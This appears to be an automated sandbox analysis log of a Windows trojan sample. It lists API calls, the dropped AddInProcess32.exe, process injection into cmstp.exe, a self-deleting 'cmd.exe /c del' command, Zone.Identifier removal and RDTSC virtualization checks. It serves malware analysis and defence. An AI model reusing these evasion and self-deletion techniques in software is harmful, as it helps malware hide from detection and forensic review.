          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA8680 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA87B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA8700 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA86FA NtReadFile,NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA867A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85CA NtCreateFile,
          Source: 583475.exe, 00000000.00000002.741383689.0000000002CF3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs 583475.exe
          Source: 583475.exe, 00000000.00000002.740499326.000000000094C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: 583475.exe, 00000000.00000002.747381692.0000000006850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs 583475.exe
          Source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs 583475.exe
          Source: 583475.exeBinary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: 583475.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\583475.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\583475.exe 'C:\Users\user\Desktop\583475.exe'
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.logJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/2@4/3
          Source: C:\Users\user\Desktop\583475.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: 583475.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 583475.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 583475.exeStatic file information: File size 1085952 > 1048576
          Source: 583475.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 583475.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108800
          Source: 583475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_00845EAE push ebx; retf
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEE70 push E8FFFFFFh; retf
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B87C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B812 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B81B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00407A17 push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004152CE push edi; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004152FD push edi; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00415CCC push esp; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00414DAE push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00414ED0 push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B7C5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0136D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA52FD push edi; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA52CE push edi; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F97A17 push cs; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FABBF4 push 00000009h; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA4ED0 push ds; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAC699 push eax; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA5CCC push esp; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA4DAE push esi; iretd
          Source: 583475.exe, Fq2/r8Q.csHigh entropy of concatenated method names: '.ctor', 'a8H', 'i8R', 'Tp4', 's7W', 'Gi4', 'n6D', 'Zg2', 'Rd8', 'a7R'
          Source: 583475.exe, Yt9/r5P.csHigh entropy of concatenated method names: '.ctor', 'x5F', 'f0T7', 'Nk53', 'i6R4', 's8LZ', 'Ro40', 'Lx8s', 'j2SA', 'Kn62'
          Source: 583475.exe, Je1w/Ec5i.csHigh entropy of concatenated method names: '.ctor', 'Cc0d', 'a5TL', 'Jz3c', 'p8KW', 'Jq19', 'Nn28', 'Pg1b', 'g2MY', 'w7KA'
          Source: 583475.exe, f4J/Cx3.csHigh entropy of concatenated method names: '.ctor', 'Yq7', 'Ep4', 't8H', 'Zw4', 'g3J', 'j5W', 'z1M', 'a7M', 'Et3'
          Source: 583475.exe, m1DY/f0L8.csHigh entropy of concatenated method names: '.ctor', 'Ym5r', 'Wa9g', 'm3W5', 'Py7i', 'Ak85', 'Wc18', 'An10', 'a6TP', 'Mo97'
          Source: 583475.exe, Qg54/Xy40.csHigh entropy of concatenated method names: '.ctor', 'f5RG', 'Nq3a', 'Ta51', 'c4Q1', 't5A2', 'Qx0n', 'm6J1', 'z2SN', 'd4P1'
          Source: 583475.exe, f6L/i0X.csHigh entropy of concatenated method names: '.ctor', 'n9X', 's0G', 'Gm4', 'Rf7', 'Ws0', 'Dn2', 'Wr6', 'o9W', 'Nb6'
          Source: 583475.exe, Lk6/Jg7.csHigh entropy of concatenated method names: '.ctor', 'Sq0', 'Fb1', 'Wa5', 'Nz6', 'i6E', 'Tr4', 'Kd6', 'c5J', 'Qe1'
          Source: 583475.exe, Sq2/Hn1.csHigh entropy of concatenated method names: '.ctor', 'Cz5', 'Qd4', 'Mj2', 'Cq2', 'Gw5', 'Zb8', 'Ez7', 's8M', 'Lz7'
          Source: 583475.exe, f1R0/p0M1.csHigh entropy of concatenated method names: '.ctor', 'Jx71', 'Ci1s', 'Dm7f', 's5FA', 'Bb5j', 'Jg47', 'Ly51', 'Cm95', 'Bs8f'
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\583475.exeFile opened: C:\Users\user\Desktop\583475.exe\:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002F98604 second address: 0000000002F9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002F9898E second address: 0000000002F98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\583475.exe TID: 6416Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Users\user\Desktop\583475.exe TID: 6416Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\583475.exe TID: 4684Thread sleep count: 502 > 30
          Source: C:\Users\user\Desktop\583475.exe TID: 4684Thread sleep count: 9368 > 30
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\583475.exeWindow / User API: threadDelayed 502
          Source: C:\Users\user\Desktop\583475.exeWindow / User API: threadDelayed 9368
          Source: C:\Users\user\Desktop\583475.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 30000
          Source: 583475.exeBinary or memory string: IHGFSD
          Source: explorer.exe, 00000009.00000000.783820666.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.780685564.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.783820666.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.761406468.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.766952588.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\583475.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0139A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01337D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01353D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133B944 mov eax, dword ptr fs:[00000030h]
